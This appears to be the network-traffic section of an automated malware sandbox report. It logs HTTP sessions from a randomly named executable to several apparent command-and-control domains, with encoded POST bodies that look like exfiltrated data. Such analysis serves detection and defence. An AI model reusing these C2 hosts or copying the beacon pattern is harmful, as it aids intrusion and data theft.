                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 31 50 6b 4f 47 4c 41 39 6c 62 6e 35 5a 67 4f 50 78 38 58 36 59 6a 66 53 31 46 72 61 79 74 39 4b 48 54 36 57 48 6f 41 43 4b 59 50 4b 66 56 58 6f 4a 6c 37 32 6d 59 77 34 78 6e 68 49 72 73 42 47 32 59 53 46 2f 46 69 76 49 53 6d 33 4d 58 45 48 75 70 2b 68 42 79 41 61 31 4c 43 45 6f 69 5a 2b 33 38 68 47 6a 6e 32 30 5a 4e 33 55 70 66 4b 6c 69 6d 49 6e 36 36 4f 50 38 55 68 45 52 4c 39 35 6d 74 6c 61 58 73 4c 44 53 71 35 45 6d 69 38 67 32 45 79 43 37 6e 38 56 68 62 78 53 68 4c 30 64 48 55 7a 44 37 41 [TRUNCATED]
                                                                                                              Data Ascii: 6n=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on1PkOGLA9lbn5ZgOPx8X6YjfS1Frayt9KHT6WHoACKYPKfVXoJl72mYw4xnhIrsBG2YSF/FivISm3MXEHup+hByAa1LCEoiZ+38hGjn20ZN3UpfKlimIn66OP8UhERL95mtlaXsLDSq5Emi8g2EyC7n8VhbxShL0dHUzD7AoHuDaF0Hx1QdlR7dmAEQczTH28AldxcPKgyhUeM1iB/Wa0ulSqF8/6haeiiLIm1Kqdzr1aq7EeZHSasQIvzyYOottWth/3Yor8uKHfJ7wrnWv9r8btCeApCQ7jVro9xbnJ8kmNXWyaACCj6zEq3tKeLWLuqL8kFWEtDfs+DvDO92zxGqi5BPaSZWfj9W3CwOjykeIiQ3ZPfls4/fx5k3eUMYkPlwtzmQz+e0l5sll6AFr5YnOrLEu42tJt4K0mJR43acwBPOZFU0iflmQnAmgNrZw/UBMI/LlMkC5JriVG5JOIu2HVCIEMH4eWv066KcSM2/zeuiR0klsr5RiJ7RnodUzWranU7L26axfPClYOFOSCtMU6NfZWABiDC6uD7y1jSMVuZIYkMv7tIiqByaG4dLWVIkDWWAakHaVV3OxPJx/oXh6XTpRA00j/q2RVI6IjA7R3oqgjm8d1shojnOLNj/kTsoBu903rE9lX6BCHkVy/IW0m/aHHeKSF0Pjm/sLK73nnTZirK75besLCG+hsHwpUNAPemwfxF5A40DL/R3KgmQsY7WeImyToiNSVTBSAm9wOG41ByjuY3mXQHQX92K+td/ZZJQQoqh7MRACURJyzpZfBysjBGdL5YEKgIz34wyd3gcDef5oJVQcf1bn+qlwap20U/DgN [TRUNCATED]
                                                                                                              Jan 11, 2025 03:24:55.059683084 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                              content-length: 0
                                                                                                              connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.105153113.248.169.48806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:24:57.135471106 CET491OUTGET /98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.optimismbank.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:00.623390913 CET371INHTTP/1.1 200 OK
                                                                                                              content-type: text/html
                                                                                                              date: Sat, 11 Jan 2025 02:25:00 GMT
                                                                                                              content-length: 250
                                                                                                              connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 6e 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 41 42 66 32 67 30 48 38 48 75 4f 4b 62 4a 67 56 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 72 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4d 62 79 68 4c 4c 51 75 5a 54 34 41 75 35 4e 51 4d 51 68 6d 31 6f 49 4f 41 4d 49 47 4d 67 3d 3d 26 50 38 64 54 3d 47 76 77 38 50 72 6b 30 48 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4"}</script></head></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.1051532209.74.77.109806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:05.784127951 CET753OUTPOST /r3zg/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.greenthub.life
                                                                                                              Origin: http://www.greenthub.life
                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 51 70 49 2b 2b 38 49 54 6f 39 75 55 56 37 4f 46 77 6e 35 35 4a 6a 4c 6b 6e 4b 45 62
                                                                                                              Data Ascii: 6n=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyQpI++8ITo9uUV7OFwn55JjLknKEb
                                                                                                              Jan 11, 2025 03:25:06.361083984 CET533INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:25:06 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 389
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.1051533209.74.77.109806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:08.329047918 CET777OUTPOST /r3zg/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.greenthub.life
                                                                                                              Origin: http://www.greenthub.life
                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 58 71 70 4d 78 78 56 4e 38 30 61 58 4b 59 74 45 42 46 61 4d 6e 6d 63 37 78 6a 56 67 3d 3d
                                                                                                              Data Ascii: 6n=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUXqpMxxVN80aXKYtEBFaMnmc7xjVg==
                                                                                                              Jan 11, 2025 03:25:08.901336908 CET533INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:25:08 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 389
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.1051534209.74.77.109806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:10.876740932 CET1790OUTPOST /r3zg/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.greenthub.life
                                                                                                              Origin: http://www.greenthub.life
                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 62 4f 64 52 2b 57 41 31 79 63 54 45 6c 6a 30 68 38 6c 37 56 4a 6f 2f 64 55 6e 49 75 6c 4e 36 49 39 36 51 49 6f 55 71 50 36 74 54 45 73 42 69 64 6c 77 76 6c 4b 56 4a 6c 4b 45 6e 45 47 64 61 4c 43 53 6a 74 39 62 52 68 31 62 47 4d 41 79 74 50 47 42 4f 54 76 4d 67 4a 71 59 6c 2f 54 32 32 32 49 52 4c 6f 42 4c 62 2f 69 55 59 6b 39 34 34 44 73 36 7a 4b 74 6a 51 36 66 6e 2b 31 2f 61 38 58 6e 44 65 30 6f 37 54 50 4b 69 72 64 6a 6a 70 64 67 67 73 55 5a 6b 51 4e 77 75 47 79 57 43 78 36 71 66 57 74 7a 5a [TRUNCATED]
                                                                                                              Data Ascii: 6n=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8bOdR+WA1ycTElj0h8l7VJo/dUnIulN6I96QIoUqP6tTEsBidlwvlKVJlKEnEGdaLCSjt9bRh1bGMAytPGBOTvMgJqYl/T222IRLoBLb/iUYk944Ds6zKtjQ6fn+1/a8XnDe0o7TPKirdjjpdggsUZkQNwuGyWCx6qfWtzZrbqmVqHA+GqkYxg/N/A6eFTG1zBPlagQkGzYtNl1pkikHHNkmO+VYF3KHFuDjB/hlI/xawGzZTULI6D4S6btKAiH+jirArIE2ax5bSOn7fIOySzNawztPrYXaFya6bezgQDKjTaYz+vYQAHSTq2r1EWtoJfsZJ2Ggiy9UPAejY0CcRVX9yafXbMRrH0hhcKHqU3c9Msc7Y8Mnmlgi2ZDZ9ec+ZoNFwsqzbEDj++/H0cFgztvpDGlqMlQMYHYgAdeDSnjv3h7t6AmJXcM/7OGr0B4x7VufTi4Dgwmg1glhohyZ1d66VO8sLz4fcnIncqxeUuASK4vg1R2Zhv3fYzeAcpKY/mO8kIjAZdt+ejto2zpOTc7X8ez6JhR0lD72gCgBePgFTQnxR48ZUBuwHrE4BJumBRBeEC3C336FRViu1X6GYLBOIxgfiUr12jVv/Z7frmAkfFBHyhJa/Ftfdl7EKGF3jl6vXdA4jlQicKG1+hLSAP7iBexUw9P97CLFw/UE01ByGFfvXaIIWdeeiwhFcNBSSCMcTjFOKp/rntTYYrJraO0ZcsLb/OkuwspBlenur6JfYfPKlKAhRNwiDHF7cx0B3kQ0tFsQVxTc+hgkSHYDyY49utSZ2hSGNDumlA429/ADrlNbekeOp8TZ5hEbOTuWae8Fpwj/I [TRUNCATED]
                                                                                                              Jan 11, 2025 03:25:11.603065968 CET533INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:25:11 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 389
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.1051535209.74.77.109806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:13.425457954 CET489OUTGET /r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A== HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.greenthub.life
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:14.002950907 CET548INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:25:13 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 389
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.105153623.225.159.42806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:19.547841072 CET747OUTPOST /n2c9/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.laohub10.net
                                                                                                              Origin: http://www.laohub10.net
                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 58 75 65 58 6d 6a 50 73 5a 6d 73 6d 78 4b 73 2b 47 78 63 54 63 35 73 68 4d 4c 2b 2f 57 6d 49 61 49 6b 4d 77 77 4b 68 67 37 55 6a 45 59 53 48 65 37 43 62 73 45 56 30 78 6c 43 55 6c 6f 52 33 4c 41 62 54 62 4f 43 74 2f 4c 75 30 52 49 6e 74 38 42 73 59 6c 6b 59 6f 73 6a 43 7a 4d 79 74 4d 79 46 4e 33 68 36 53 58 44 63 71 4c 54 38 49 68 4e 44 31 75 75 6f 79 48 47 78 72 54 62 2f 46 46 5a 4a 63 37 4f 75 6e 6c 39 58 4e 48 35 4d 4c 44 49 78 39 67 38 37 56 78 2b 71 36 78 54 71 31 4e 66 34 51 46 38 71 54 75 4c 62 4b 61 32 66 6e 35 33
                                                                                                              Data Ascii: 6n=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g87Vx+q6xTq1Nf4QF8qTuLbKa2fn53
                                                                                                              Jan 11, 2025 03:25:20.065481901 CET533INHTTP/1.1 200 OK
                                                                                                              Server: Apache
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Accept-Ranges: bytes
                                                                                                              Cache-Control: max-age=86400
                                                                                                              Age: 1
                                                                                                              Connection: Close
                                                                                                              Content-Length: 358
